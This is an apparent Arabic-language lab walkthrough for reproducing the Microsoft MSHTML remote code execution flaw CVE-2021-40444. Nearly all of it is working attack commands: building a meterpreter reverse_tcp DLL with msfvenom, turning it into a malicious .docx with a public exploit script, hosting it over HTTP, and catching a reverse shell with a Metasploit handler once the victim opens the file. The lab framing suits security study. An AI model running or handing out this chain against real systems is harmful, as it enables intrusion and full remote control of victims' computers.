
محاولة لإعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في Microsoft MSHTML باستخدام إطار Metasploit.
محاولة لإعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في Microsoft MSHTML باستخدام إطار عمل Metasploit.
يعمل بشكل أفضل إذا لم يتم تشغيله في FlareVM
قم باستنساخ المستودع من https://github.com/lockedbyte/CVE-2021-40444
قم بإعداد قالب .dll لاستخدامه لاحقاً مع msfvenom
msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll
انسخ ملف template.dll الذي تم إنشاؤه حديثاً إلى المجلد test/ من المستودع
امنح صلاحية التنفيذ لـ template.dll باستخدام chmod +x template.dll
قم بتشغيل البرنامج النصي لاستخدام template.dll ومعالجته إلى
outputpython3 exploit.py generate ~/test/template.dll http://<SOURCE IP>سيتم تصدير المستند بعد ذلك إلى مجلد out/ ويمكننا إنشاء مستمع على منفذ HTTP الخاص بنا (الافتراضي هو 80)
python3 exploit.py host 80
قم بتشغيل metasploit باستخدام
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <SOURCE IP>
run
ثم يمكننا إرسال document.docx إلى جهازنا الضعيف وتنفيذ ملف .docx
سنتلقى استجابة في طرفية exploit.py وتكون التجربة ناجحة إذا تمكنا من فتح قشرة tcp عكسية.